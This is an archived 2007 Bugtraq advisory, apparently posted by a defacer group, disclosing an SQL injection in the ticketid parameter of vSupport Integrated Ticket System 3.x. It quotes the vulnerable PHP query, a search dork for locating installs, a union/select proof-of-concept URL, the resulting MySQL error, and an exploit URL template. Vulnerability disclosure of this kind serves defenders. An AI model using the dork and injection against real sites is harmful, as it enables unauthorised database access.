Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

vSupport Integrated Ticket System 3.*.* SQL injection

From: stormhacker () hotmail com
Date: 9 Jun 2007 14:33:40 -0000
+--------------------------------------------------------------------
+
+ Affected Software .: vSupport Integrated Ticket System
+ Venedor ...........: http://www.cmgsccc.com 
+ Class .............: SQL injection
+ Dork ..............: inurl:vBSupport.php
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+ PoC:
+
+ Database error SQL
+--------------------------------------------------------------------
                // do not limit the users access
                $fromuseraccess = "";
        }

        // get the info about the ticket first
        if ($ticket = $db->query_first("
                SELECT ticket.*
                " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . "
                FROM " . TABLE_PREFIX . "ticket as ticket
                " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon 
ON(icon.iconid = ticket.iconid)") . "
                WHERE ticketid=" . $vbulletin->GPC['ticketid'] . "
                $fromuseraccess
        "))
        {


+--------------------------------------------------------------------
+  An example:
+--------------------------------------------------------------------

http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/

+--------------------------------------------------------------------
+  output:
+--------------------------------------------------------------------

MySQL Error  : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for 
the right syntax to use near '' at line 5
Error Number : 1064


Date         : Monday, July 2nd 2007 @ 02:54:54 PM
Script       : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/select/**/
Referrer     : 
IP Address   : 127.0.0.1
Username     : admin
Classname    : vb_database
Invalid SQL:

                SELECT ticket.*
                ,icon.title AS icontitle, icon.iconpath
                FROM ticket as ticket
                LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid)
                WHERE ticketid=1/**/union/**/select/**/;
+--------------------------------------------------------------------
+  Exploit :
+--------------------------------------------------------------------
http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL]

+--------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: